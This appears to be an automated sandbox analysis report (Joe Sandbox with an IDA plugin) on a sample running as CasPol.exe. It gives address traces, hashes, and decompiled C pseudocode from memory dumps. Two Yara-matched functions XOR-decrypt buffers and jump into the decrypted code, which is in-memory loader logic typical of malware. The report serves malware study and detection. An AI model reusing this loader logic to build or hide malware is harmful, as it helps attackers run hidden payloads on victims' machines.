                                                                0x00000000
                                                                0x0169bde3
                                                                0x0165fb86
                                                                0x0165fb86
                                                                0x0165fb86
                                                                0x0165fb8b
                                                                0x0165fb90
                                                                0x0165fb92
                                                                0x0165fb94
                                                                0x0165fb9a
                                                                0x0165fb9b
                                                                0x0165fba1
                                                                0x0169bde8
                                                                0x0169bdeb
                                                                0x0169bded
                                                                0x0169beb5
                                                                0x0169beb5
                                                                0x0169bebb
                                                                0x0169bebd
                                                                0x0169bec3
                                                                0x0169bed2
                                                                0x0169bedd
                                                                0x0169bedd
                                                                0x0169beed
                                                                0x00000000
                                                                0x0169bdf3
                                                                0x0169bdfe
                                                                0x0169be06
                                                                0x0169be0b
                                                                0x0169be0d
                                                                0x0169be0f
                                                                0x0169be14
                                                                0x0169be19
                                                                0x0169be20
                                                                0x0169be25
                                                                0x0169be27
                                                                0x0169be35
                                                                0x0169be39
                                                                0x0169be46
                                                                0x0169be4f
                                                                0x0169be54
                                                                0x0169be56
                                                                0x0169bef8
                                                                0x0169bef8
                                                                0x00000000
                                                                0x0169be5c
                                                                0x0169be5c
                                                                0x0169be60
                                                                0x00000000
                                                                0x0169be66
                                                                0x0169be66
                                                                0x0169be7f
                                                                0x0169be84
                                                                0x0169be87
                                                                0x0169be89
                                                                0x0169be8b
                                                                0x0169be99
                                                                0x0169be9d
                                                                0x0169bea0
                                                                0x0169beac
                                                                0x0169beaf
                                                                0x0169beb1
                                                                0x0169beb3
                                                                0x0169beb3
                                                                0x00000000
                                                                0x0169bea2
                                                                0x0169bea2
                                                                0x00000000
                                                                0x0169bea2
                                                                0x0169be8d
                                                                0x0169be8d
                                                                0x0169be92
                                                                0x00000000
                                                                0x0169be92
                                                                0x0169be8b
                                                                0x0169be60
                                                                0x0169be3b
                                                                0x0169be3b
                                                                0x0169be3e
                                                                0x00000000
                                                                0x0169be40
                                                                0x0169be40
                                                                0x0169be44
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0169be44
                                                                0x0169be3e
                                                                0x0169be29
                                                                0x0169be29
                                                                0x00000000
                                                                0x0169be29
                                                                0x0169be27
                                                                0x00000000
                                                                0x0165fba7
                                                                0x0165fba7
                                                                0x0165fbab
                                                                0x0169bf02
                                                                0x0165fbb1
                                                                0x0165fbb1
                                                                0x0165fbb8
                                                                0x0165fbbd
                                                                0x0165fbbd
                                                                0x0165fbbf
                                                                0x0165fbbf
                                                                0x0165fbc5
                                                                0x0165fbcb
                                                                0x0165fbf8
                                                                0x0165fbf8
                                                                0x0165fbfa
                                                                0x00000000
                                                                0x0165fc00
                                                                0x0165fc00
                                                                0x0165fc03
                                                                0x00000000
                                                                0x0165fc09
                                                                0x0165fc09
                                                                0x0165fc0f
                                                                0x0165fc15
                                                                0x0165fc23
                                                                0x0165fc23
                                                                0x0165fc25
                                                                0x0165fc27
                                                                0x0165fc75
                                                                0x0165fc7c
                                                                0x0165fc84
                                                                0x00000000
                                                                0x0165fc29
                                                                0x0165fc29
                                                                0x0165fc2d
                                                                0x0165fc30
                                                                0x0169bf0f
                                                                0x00000000
                                                                0x0165fc36
                                                                0x0165fc38
                                                                0x0165fc3b
                                                                0x0165fc41
                                                                0x0169bf17
                                                                0x0169bf19
                                                                0x0169bf48
                                                                0x0169bf4b
                                                                0x00000000
                                                                0x0169bf1b
                                                                0x0169bf22
                                                                0x0169bf24
                                                                0x0169bf26
                                                                0x00000000
                                                                0x0169bf2c
                                                                0x0169bf37
                                                                0x0169bf39
                                                                0x0169bf3b
                                                                0x00000000
                                                                0x0169bf41
                                                                0x0169bf41
                                                                0x0169bf41
                                                                0x0169bf41
                                                                0x0169bf45
                                                                0x00000000
                                                                0x0169bf45
                                                                0x0169bf3b
                                                                0x0169bf26
                                                                0x00000000
                                                                0x0165fc47
                                                                0x0165fc47
                                                                0x0165fc49
                                                                0x0165fcb2
                                                                0x0165fcb4
                                                                0x0165fcb6
                                                                0x0165fcdc
                                                                0x0165fcdc
                                                                0x00000000
                                                                0x0165fcb8
                                                                0x0165fcc3
                                                                0x0165fcc5
                                                                0x0165fcc7
                                                                0x00000000
                                                                0x0165fcc9
                                                                0x0165fcc9
                                                                0x0165fccd
                                                                0x00000000
                                                                0x0165fccd
                                                                0x0165fcc7
                                                                0x00000000
                                                                0x0165fc4b
                                                                0x0165fc4b
                                                                0x0165fc4e
                                                                0x0165fc4e
                                                                0x0165fc51
                                                                0x0165fc51
                                                                0x0165fc54
                                                                0x0165fc5a
                                                                0x0165fc5c
                                                                0x0165fc5f
                                                                0x0165fc61
                                                                0x0165fc63
                                                                0x0165fc65
                                                                0x0165fc67
                                                                0x0165fc6e
                                                                0x0165fc72
                                                                0x0165fc72
                                                                0x0165fc72
                                                                0x0165fc72
                                                                0x0165fc67
                                                                0x0165fc61
                                                                0x00000000
                                                                0x0165fc5a
                                                                0x0165fc49
                                                                0x0165fc41
                                                                0x0165fc30
                                                                0x0165fc27
                                                                0x0165fc03
                                                                0x0165fbcd
                                                                0x0165fbd3
                                                                0x0165fbd9
                                                                0x0165fbdc
                                                                0x0165fbde
                                                                0x0165fc99
                                                                0x0165fc9b
                                                                0x0165fc9d
                                                                0x0165fcd5
                                                                0x0165fcd5
                                                                0x0165fc89
                                                                0x0165fc89
                                                                0x00000000
                                                                0x0165fc9f
                                                                0x0165fc9f
                                                                0x0165fca3
                                                                0x00000000
                                                                0x0165fca3
                                                                0x00000000
                                                                0x0165fbe4
                                                                0x0165fbe4
                                                                0x0165fbe4
                                                                0x0165fbe4
                                                                0x0165fbe9
                                                                0x0165fbf2
                                                                0x00000000
                                                                0x0165fbf2
                                                                0x0165fbde
                                                                0x0165fbcb
                                                                0x0165fbab
                                                                0x0165fc8b
                                                                0x0165fc8b
                                                                0x0165fc8c
                                                                0x0165fb80
                                                                0x0165fb72
                                                                0x0165fb5e
                                                                0x0165fc8d
                                                                0x0165fc91
                                                                0x0165fadf
                                                                0x0165fadf
                                                                0x0165fae1
                                                                0x0165fae4
                                                                0x0165fae7
                                                                0x0165faec
                                                                0x0165faf8
                                                                0x0165fb00
                                                                0x0165fb07
                                                                0x0165fb0f
                                                                0x0165fb0f
                                                                0x0165fb07
                                                                0x00000000
                                                                0x0165faf8
                                                                0x0165fadd

                                                                Strings
                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0169BE0F
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                • API String ID: 0-865735534
                                                                • Opcode ID: 64732b5f389aba358531cf5125e85502d3179a33c80a88a1d06efc26124f88bd
                                                                • Instruction ID: be721b9357b276afb43cbbaf3af4aefcd44d32d31b1f22ba88705462851701b7
                                                                • Opcode Fuzzy Hash: 64732b5f389aba358531cf5125e85502d3179a33c80a88a1d06efc26124f88bd
                                                                • Instruction Fuzzy Hash: B1A1D372B00606CBEB65DB6CCC50B7AB7AAAF44720F0445BDED46DB791DB34D8428B90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 63%
                                                                			E01622D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                				signed char _v8;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed int _v24;
                                                                				intOrPtr _v28;
                                                                				intOrPtr _v32;
                                                                				signed int _v52;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				intOrPtr _t55;
                                                                				signed int _t57;
                                                                				signed int _t58;
                                                                				char* _t62;
                                                                				signed char* _t63;
                                                                				signed char* _t64;
                                                                				signed int _t67;
                                                                				signed int _t72;
                                                                				signed int _t77;
                                                                				signed int _t78;
                                                                				signed int _t88;
                                                                				intOrPtr _t89;
                                                                				signed char _t93;
                                                                				signed int _t97;
                                                                				signed int _t98;
                                                                				signed int _t102;
                                                                				signed int _t103;
                                                                				intOrPtr _t104;
                                                                				signed int _t105;
                                                                				signed int _t106;
                                                                				signed char _t109;
                                                                				signed int _t111;
                                                                				void* _t116;
                                                                
                                                                				_t102 = __edi;
                                                                				_t97 = __edx;
                                                                				_v12 = _v12 & 0x00000000;
                                                                				_t55 =  *[fs:0x18];
                                                                				_t109 = __ecx;
                                                                				_v8 = __edx;
                                                                				_t86 = 0;
                                                                				_v32 = _t55;
                                                                				_v24 = 0;
                                                                				_push(__edi);
                                                                				if(__ecx == 0x1715350) {
                                                                					_t86 = 1;
                                                                					_v24 = 1;
                                                                					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                				}
                                                                				_t103 = _t102 | 0xffffffff;
                                                                				if( *0x1717bc8 != 0) {
                                                                					_push(0xc000004b);
                                                                					_push(_t103);
                                                                					E016697C0();
                                                                				}
                                                                				if( *0x17179c4 != 0) {
                                                                					_t57 = 0;
                                                                				} else {
                                                                					_t57 = 0x17179c8;
                                                                				}
                                                                				_v16 = _t57;
                                                                				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                					_t93 = _t109;
                                                                					L23();
                                                                				}
                                                                				_t58 =  *_t109;
                                                                				if(_t58 == _t103) {
                                                                					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                					_t58 = _t103;
                                                                					if(__eflags == 0) {
                                                                						_t93 = _t109;
                                                                						E01651624(_t86, __eflags);
                                                                						_t58 =  *_t109;
                                                                					}
                                                                				}
                                                                				_v20 = _v20 & 0x00000000;
                                                                				if(_t58 != _t103) {
                                                                					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                				}
                                                                				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                				_t88 = _v16;
                                                                				_v28 = _t104;
                                                                				L9:
                                                                				while(1) {
                                                                					if(E01647D50() != 0) {
                                                                						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                					} else {
                                                                						_t62 = 0x7ffe0382;
                                                                					}
                                                                					if( *_t62 != 0) {
                                                                						_t63 =  *[fs:0x30];
                                                                						__eflags = _t63[0x240] & 0x00000002;
                                                                						if((_t63[0x240] & 0x00000002) != 0) {
                                                                							_t93 = _t109;
                                                                							E016BFE87(_t93);
                                                                						}
                                                                					}
                                                                					if(_t104 != 0xffffffff) {
                                                                						_push(_t88);
                                                                						_push(0);
                                                                						_push(_t104);
                                                                						_t64 = E01669520();
                                                                						goto L15;
                                                                					} else {
                                                                						while(1) {
                                                                							_t97 =  &_v8;
                                                                							_t64 = E0165E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                							if(_t64 == 0x102) {
                                                                								break;
                                                                							}
                                                                							_t93 =  *(_t109 + 4);
                                                                							_v8 = _t93;
                                                                							if((_t93 & 0x00000002) != 0) {
                                                                								continue;
                                                                							}
                                                                							L15:
                                                                							if(_t64 == 0x102) {
                                                                								break;
                                                                							}
                                                                							_t89 = _v24;
                                                                							if(_t64 < 0) {
                                                                								L0167DF30(_t93, _t97, _t64);
                                                                								_push(_t93);
                                                                								_t98 = _t97 | 0xffffffff;
                                                                								__eflags =  *0x1716901;
                                                                								_push(_t109);
                                                                								_v52 = _t98;
                                                                								if( *0x1716901 != 0) {
                                                                									_push(0);
                                                                									_push(1);
                                                                									_push(0);
                                                                									_push(0x100003);
                                                                									_push( &_v12);
                                                                									_t72 = E01669980();
                                                                									__eflags = _t72;
                                                                									if(_t72 < 0) {
                                                                										_v12 = _t98 | 0xffffffff;
                                                                									}
                                                                								}
                                                                								asm("lock cmpxchg [ecx], edx");
                                                                								_t111 = 0;
                                                                								__eflags = 0;
                                                                								if(0 != 0) {
                                                                									__eflags = _v12 - 0xffffffff;
                                                                									if(_v12 != 0xffffffff) {
                                                                										_push(_v12);
                                                                										E016695D0();
                                                                									}
                                                                								} else {
                                                                									_t111 = _v12;
                                                                								}
                                                                								return _t111;
                                                                							} else {
                                                                								if(_t89 != 0) {
                                                                									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                									_t77 = E01647D50();
                                                                									__eflags = _t77;
                                                                									if(_t77 == 0) {
                                                                										_t64 = 0x7ffe0384;
                                                                									} else {
                                                                										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                									}
                                                                									__eflags =  *_t64;
                                                                									if( *_t64 != 0) {
                                                                										_t64 =  *[fs:0x30];
                                                                										__eflags = _t64[0x240] & 0x00000004;
                                                                										if((_t64[0x240] & 0x00000004) != 0) {
                                                                											_t78 = E01647D50();
                                                                											__eflags = _t78;
                                                                											if(_t78 == 0) {
                                                                												_t64 = 0x7ffe0385;
                                                                											} else {
                                                                												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                											}
                                                                											__eflags =  *_t64 & 0x00000020;
                                                                											if(( *_t64 & 0x00000020) != 0) {
                                                                												_t64 = E016A7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                											}
                                                                										}
                                                                									}
                                                                								}
                                                                								return _t64;
                                                                							}
                                                                						}
                                                                						_t97 = _t88;
                                                                						_t93 = _t109;
                                                                						E016BFDDA(_t97, _v12);
                                                                						_t105 =  *_t109;
                                                                						_t67 = _v12 + 1;
                                                                						_v12 = _t67;
                                                                						__eflags = _t105 - 0xffffffff;
                                                                						if(_t105 == 0xffffffff) {
                                                                							_t106 = 0;
                                                                							__eflags = 0;
                                                                						} else {
                                                                							_t106 =  *(_t105 + 0x14);
                                                                						}
                                                                						__eflags = _t67 - 2;
                                                                						if(_t67 > 2) {
                                                                							__eflags = _t109 - 0x1715350;
                                                                							if(_t109 != 0x1715350) {
                                                                								__eflags = _t106 - _v20;
                                                                								if(__eflags == 0) {
                                                                									_t93 = _t109;
                                                                									E016BFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                								}
                                                                							}
                                                                						}
                                                                						_push("RTL: Re-Waiting\n");
                                                                						_push(0);
                                                                						_push(0x65);
                                                                						_v20 = _t106;
                                                                						E016B5720();
                                                                						_t104 = _v28;
                                                                						_t116 = _t116 + 0xc;
                                                                						continue;
                                                                					}
                                                                				}
                                                                			}


                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Re-Waiting
                                                                • API String ID: 0-316354757
                                                                • Opcode ID: f6c31af095f280c9ffb20cdce670076f30d0bf30b61617846559eef37041df4d
                                                                • Instruction ID: 68cbf1464b92325758f6f69cec5b908bc7b86323e456486a8149e8617371c872
                                                                • Opcode Fuzzy Hash: f6c31af095f280c9ffb20cdce670076f30d0bf30b61617846559eef37041df4d
                                                                • Instruction Fuzzy Hash: 62612331A00A15DFEB32EB6CCC90B7EBBA6EB40724F1406ADE961973C1C7349941CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 53%
                                                                			E00401798(void* __eax, void* __esi, intOrPtr _a4, signed int _a8, signed int* _a12) {
                                                                				intOrPtr _v8;
                                                                				signed int _v12;
                                                                				char _v54;
                                                                				short _v56;
                                                                				intOrPtr _v60;
                                                                				intOrPtr _v64;
                                                                				signed char _t98;
                                                                				signed int _t100;
                                                                				signed int _t102;
                                                                				signed int _t103;
                                                                				void* _t106;
                                                                				intOrPtr _t107;
                                                                				char _t123;
                                                                				signed int _t134;
                                                                				intOrPtr _t136;
                                                                				signed int _t138;
                                                                				signed int _t140;
                                                                				void* _t141;
                                                                				signed char _t144;
                                                                				void* _t145;
                                                                				signed char _t148;
                                                                				signed int _t151;
                                                                				signed char _t153;
                                                                				signed char _t155;
                                                                				signed int _t157;
                                                                				intOrPtr _t159;
                                                                				void* _t160;
                                                                				void* _t161;
                                                                				void* _t162;
                                                                				signed int _t165;
                                                                				void* _t166;
                                                                				signed int* _t168;
                                                                				void* _t171;
                                                                				void* _t173;
                                                                				void* _t174;
                                                                
                                                                				asm("adc edx, [edi]");
                                                                				_t98 = __eax + __esi;
                                                                				0xec8b();
                                                                				_t171 = _t173;
                                                                				_t174 = _t173 - 0x3c;
                                                                				if(_a4 != 0) {
                                                                					_t157 = _a8;
                                                                					if(_t157 != 0) {
                                                                						_push(__esi);
                                                                						_t168 = _a12;
                                                                						_t98 = _t168[0x7c] ^ _t168[0x78];
                                                                						_t134 =  &(_t168[0x78]);
                                                                						if(_t157 >= _t98) {
                                                                							_t100 = E00401D80();
                                                                							_t168[0x4f] = _t168[0x4f] ^  *_t134;
                                                                							_t140 = _t168[0x4f];
                                                                							_t168[3] = _t100;
                                                                							_t102 = _t157 / _t140;
                                                                							_t159 = 0;
                                                                							_t168[0x86] = _t134;
                                                                							_t136 = _a4;
                                                                							 *_t168 = _t102;
                                                                							_t103 = _t102 * _t140;
                                                                							_t168[0x68] = _t103;
                                                                							if(_t103 != 0) {
                                                                								do {
                                                                									_t159 = _t159 + 1;
                                                                									 *(_t159 + _t136 - 1) =  *(_t159 + _t136 - 1) ^  *(_t168[0x86]);
                                                                									_t155 =  *(_t168[0x86] + 1) ^  *(_t159 + _t136 - 1) & 0x000000ff;
                                                                									 *(_t159 + _t136 - 1) = _t155;
                                                                									_t148 =  *(_t168[0x86] + 2) ^ _t155;
                                                                									 *(_t159 + _t136 - 1) = _t148;
                                                                									 *(_t159 + _t136 - 1) =  *(_t168[0x86] + 3) ^ _t148;
                                                                								} while (_t159 < _t168[0x68]);
                                                                							}
                                                                							_t160 = 0;
                                                                							if(_t168[0x4f] != 1) {
                                                                								do {
                                                                									_t123 = L00401C40(1, _t168[0x4f] - 1);
                                                                									_t174 = _t174 + 8;
                                                                									_t145 = 0;
                                                                									while(_t123 !=  *((intOrPtr*)(_t168 + _t145 + 0x24))) {
                                                                										_t145 = _t145 + 1;
                                                                										if(_t145 <= _t160) {
                                                                											continue;
                                                                										} else {
                                                                											if(_t123 != 0) {
                                                                												 *((char*)(_t168 + _t160 + 0x24)) = _t123;
                                                                												_t160 = _t160 + 1;
                                                                											}
                                                                										}
                                                                										goto L12;
                                                                									}
                                                                									L12:
                                                                								} while (_t160 < _t168[0x4f] - 1);
                                                                							}
                                                                							asm("xorps xmm0, xmm0");
                                                                							_v64 = 0x5b27409e;
                                                                							_v60 = 0x405b5b5b;
                                                                							_v56 = 0x962e;
                                                                							_v54 = 8;
                                                                							asm("movq [ebp-0x31], xmm0");
                                                                							asm("movq [ebp-0x29], xmm0");
                                                                							_t106 = 0;
                                                                							do {
                                                                								 *(_t171 + _t106 - 0x3c) =  *(_t171 + _t106 - 0x3c) ^ 0x000000cb;
                                                                								_t106 = _t106 + 1;
                                                                							} while (_t106 < 0xb);
                                                                							_t107 = 0;
                                                                							_v8 = 0;
                                                                							if(_t168[0x4f] > 0) {
                                                                								do {
                                                                									_t165 = ( *(_t168 + _t107 + 0x24) & 0x000000ff) *  *_t168 + _t136;
                                                                									_t168[0x63] = _t165;
                                                                									asm("movq xmm0, [edi]");
                                                                									asm("movq [ebp-0x10], xmm0");
                                                                									asm("movq xmm0, [edi+0x8]");
                                                                									asm("movq [ebp-0x18], xmm0");
                                                                									asm("movq xmm0, [edi+0x10]");
                                                                									asm("movq [ebp-0x20], xmm0");
                                                                									asm("movq xmm0, [ebp-0x3c]");
                                                                									asm("movq [edi], xmm0");
                                                                									 *((short*)(_t165 + 8)) = _v56;
                                                                									 *((char*)(_t165 + 0xa)) = _v54;
                                                                									_v12 = _t165;
                                                                									 *(_t168[0x63])();
                                                                									asm("movq xmm0, [ebp-0x10]");
                                                                									asm("movq [edi], xmm0");
                                                                									asm("movq xmm0, [ebp-0x18]");
                                                                									asm("movq [edi+0x8], xmm0");
                                                                									asm("movq xmm0, [ebp-0x20]");
                                                                									asm("movq [edi+0x10], xmm0");
                                                                									_t166 = 0;
                                                                									if( *_t168 > 0) {
                                                                										_t138 = _v12;
                                                                										do {
                                                                											_t166 = _t166 + 1;
                                                                											 *(_t166 + _t138 - 1) =  *(_t166 + _t138 - 1) ^ _t168[0x86][0];
                                                                											_t153 = _t168[0x86][0] ^  *(_t166 + _t138 - 1) & 0x000000ff;
                                                                											 *(_t166 + _t138 - 1) = _t153;
                                                                											_t144 = _t168[0x86][0] ^ _t153;
                                                                											 *(_t166 + _t138 - 1) = _t144;
                                                                											 *(_t166 + _t138 - 1) =  *(_t168[0x86]) ^ _t144;
                                                                										} while (_t166 <  *_t168);
                                                                									}
                                                                									_t136 = _a4;
                                                                									_t107 = _v8 + 1;
                                                                									_v8 = _t107;
                                                                								} while (_t107 < _t168[0x4f]);
                                                                							}
                                                                							_t98 = E00401D80();
                                                                							_t151 = _t168[3];
                                                                							_t168[0x7a] = _t98;
                                                                							_t92 = _t98 - 2; // -2
                                                                							_t161 = _t92;
                                                                							if(_t151 != 0 && _t161 != 0 && _t151 < _t161) {
                                                                								_t141 = 0;
                                                                								_t162 = _t161 - _t151;
                                                                								if(_t162 != 0) {
                                                                									do {
                                                                										_t98 =  *((intOrPtr*)(_t141 + _t151 + 1)) + 0x61;
                                                                										 *(_t141 + _t151) =  *(_t141 + _t151) ^ _t98;
                                                                										_t141 = _t141 + 1;
                                                                									} while (_t141 < _t162);
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				return _t98;
                                                                			}






































                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: [[[@
                                                                • API String ID: 0-1915900897
                                                                • Opcode ID: bf2452841ec8a52e767ca0e35ee9d10767a69407195e395a6cf45bf687ade4d9
                                                                • Instruction ID: 41084b55ac57c2d3c1eabc5a8f697687b7e59c0d76447f44c227e3c118e3a84d
                                                                • Opcode Fuzzy Hash: bf2452841ec8a52e767ca0e35ee9d10767a69407195e395a6cf45bf687ade4d9
                                                                • Instruction Fuzzy Hash: 8571BF71904B859BC712DF78C4D02EAFBF1FF9A300F14865AD4A9A7351D730A684CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 82%
                                                                			E004017A0(intOrPtr _a4, signed int _a8, signed int* _a12) {
                                                                				intOrPtr _v8;
                                                                				signed int _v12;
                                                                				char _v54;
                                                                				short _v56;
                                                                				intOrPtr _v60;
                                                                				intOrPtr _v64;
                                                                				signed char _t97;
                                                                				signed int _t99;
                                                                				signed int _t101;
                                                                				signed int _t102;
                                                                				void* _t105;
                                                                				intOrPtr _t106;
                                                                				char _t122;
                                                                				signed int _t133;
                                                                				intOrPtr _t135;
                                                                				signed int _t137;
                                                                				signed int _t139;
                                                                				void* _t140;
                                                                				signed char _t143;
                                                                				void* _t144;
                                                                				signed char _t147;
                                                                				signed int _t150;
                                                                				signed char _t152;
                                                                				signed char _t154;
                                                                				signed int _t156;
                                                                				intOrPtr _t158;
                                                                				void* _t159;
                                                                				void* _t160;
                                                                				void* _t161;
                                                                				signed int _t164;
                                                                				void* _t165;
                                                                				signed int* _t167;
                                                                				void* _t169;
                                                                				void* _t170;
                                                                
                                                                				if(_a4 == 0) {
                                                                					return _t97;
                                                                				}
                                                                				_t156 = _a8;
                                                                				if(_t156 == 0) {
                                                                					L27:
                                                                					return _t97;
                                                                				}
                                                                				_t167 = _a12;
                                                                				_t97 = _t167[0x7c] ^ _t167[0x78];
                                                                				_t133 =  &(_t167[0x78]);
                                                                				if(_t156 < _t97) {
                                                                					L26:
                                                                					goto L27;
                                                                				}
                                                                				_t99 = E00401D80();
                                                                				_t167[0x4f] = _t167[0x4f] ^  *_t133;
                                                                				_t139 = _t167[0x4f];
                                                                				_t167[3] = _t99;
                                                                				_t101 = _t156 / _t139;
                                                                				_t158 = 0;
                                                                				_t167[0x86] = _t133;
                                                                				_t135 = _a4;
                                                                				 *_t167 = _t101;
                                                                				_t102 = _t101 * _t139;
                                                                				_t167[0x68] = _t102;
                                                                				if(_t102 == 0) {
                                                                					L5:
                                                                					_t159 = 0;
                                                                					if(_t167[0x4f] == 1) {
                                                                						L12:
                                                                						asm("xorps xmm0, xmm0");
                                                                						_v64 = 0x5b27409e;
                                                                						_v60 = 0x405b5b5b;
                                                                						_v56 = 0x962e;
                                                                						_v54 = 8;
                                                                						asm("movq [ebp-0x31], xmm0");
                                                                						asm("movq [ebp-0x29], xmm0");
                                                                						_t105 = 0;
                                                                						do {
                                                                							 *(_t169 + _t105 - 0x3c) =  *(_t169 + _t105 - 0x3c) ^ 0x000000cb;
                                                                							_t105 = _t105 + 1;
                                                                						} while (_t105 < 0xb);
                                                                						_t106 = 0;
                                                                						_v8 = 0;
                                                                						if(_t167[0x4f] <= 0) {
                                                                							L20:
                                                                							_t97 = E00401D80();
                                                                							_t150 = _t167[3];
                                                                							_t167[0x7a] = _t97;
                                                                							_t92 = _t97 - 2; // -2
                                                                							_t160 = _t92;
                                                                							if(_t150 != 0 && _t160 != 0 && _t150 < _t160) {
                                                                								_t140 = 0;
                                                                								_t161 = _t160 - _t150;
                                                                								if(_t161 == 0) {
                                                                									goto L26;
                                                                								}
                                                                								do {
                                                                									_t97 =  *((intOrPtr*)(_t140 + _t150 + 1)) + 0x61;
                                                                									 *(_t140 + _t150) =  *(_t140 + _t150) ^ _t97;
                                                                									_t140 = _t140 + 1;
                                                                								} while (_t140 < _t161);
                                                                							}
                                                                							goto L26;
                                                                						}
                                                                						do {
                                                                							_t164 = ( *(_t167 + _t106 + 0x24) & 0x000000ff) *  *_t167 + _t135;
                                                                							_t167[0x63] = _t164;
                                                                							asm("movq xmm0, [edi]");
                                                                							asm("movq [ebp-0x10], xmm0");
                                                                							asm("movq xmm0, [edi+0x8]");
                                                                							asm("movq [ebp-0x18], xmm0");
                                                                							asm("movq xmm0, [edi+0x10]");
                                                                							asm("movq [ebp-0x20], xmm0");
                                                                							asm("movq xmm0, [ebp-0x3c]");
                                                                							asm("movq [edi], xmm0");
                                                                							 *((short*)(_t164 + 8)) = _v56;
                                                                							 *((char*)(_t164 + 0xa)) = _v54;
                                                                							_v12 = _t164;
                                                                							 *(_t167[0x63])();
                                                                							asm("movq xmm0, [ebp-0x10]");
                                                                							asm("movq [edi], xmm0");
                                                                							asm("movq xmm0, [ebp-0x18]");
                                                                							asm("movq [edi+0x8], xmm0");
                                                                							asm("movq xmm0, [ebp-0x20]");
                                                                							asm("movq [edi+0x10], xmm0");
                                                                							_t165 = 0;
                                                                							if( *_t167 <= 0) {
                                                                								goto L19;
                                                                							}
                                                                							_t137 = _v12;
                                                                							do {
                                                                								_t165 = _t165 + 1;
                                                                								 *(_t165 + _t137 - 1) =  *(_t165 + _t137 - 1) ^ _t167[0x86][0];
                                                                								_t152 = _t167[0x86][0] ^  *(_t165 + _t137 - 1) & 0x000000ff;
                                                                								 *(_t165 + _t137 - 1) = _t152;
                                                                								_t143 = _t167[0x86][0] ^ _t152;
                                                                								 *(_t165 + _t137 - 1) = _t143;
                                                                								 *(_t165 + _t137 - 1) =  *(_t167[0x86]) ^ _t143;
                                                                							} while (_t165 <  *_t167);
                                                                							L19:
                                                                							_t135 = _a4;
                                                                							_t106 = _v8 + 1;
                                                                							_v8 = _t106;
                                                                						} while (_t106 < _t167[0x4f]);
                                                                						goto L20;
                                                                					} else {
                                                                						goto L6;
                                                                					}
                                                                					do {
                                                                						L6:
                                                                						_t122 = L00401C40(1, _t167[0x4f] - 1);
                                                                						_t170 = _t170 + 8;
                                                                						_t144 = 0;
                                                                						while(_t122 !=  *((intOrPtr*)(_t167 + _t144 + 0x24))) {
                                                                							_t144 = _t144 + 1;
                                                                							if(_t144 <= _t159) {
                                                                								continue;
                                                                							}
                                                                							if(_t122 != 0) {
                                                                								 *((char*)(_t167 + _t159 + 0x24)) = _t122;
                                                                								_t159 = _t159 + 1;
                                                                							}
                                                                							goto L11;
                                                                						}
                                                                						L11:
                                                                					} while (_t159 < _t167[0x4f] - 1);
                                                                					goto L12;
                                                                				} else {
                                                                					goto L4;
                                                                				}
                                                                				do {
                                                                					L4:
                                                                					_t158 = _t158 + 1;
                                                                					 *(_t158 + _t135 - 1) =  *(_t158 + _t135 - 1) ^  *(_t167[0x86]);
                                                                					_t154 =  *(_t167[0x86] + 1) ^  *(_t158 + _t135 - 1) & 0x000000ff;
                                                                					 *(_t158 + _t135 - 1) = _t154;
                                                                					_t147 =  *(_t167[0x86] + 2) ^ _t154;
                                                                					 *(_t158 + _t135 - 1) = _t147;
                                                                					 *(_t158 + _t135 - 1) = _t167[0x86][0] ^ _t147;
                                                                				} while (_t158 < _t167[0x68]);
                                                                				goto L5;
                                                                			}


                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: [[[@
                                                                • API String ID: 0-1915900897
                                                                • Opcode ID: 3bab81cb22c670ba8c2558139e2c5177ac26d8abfd67ee5da1f9d1a83d34915d
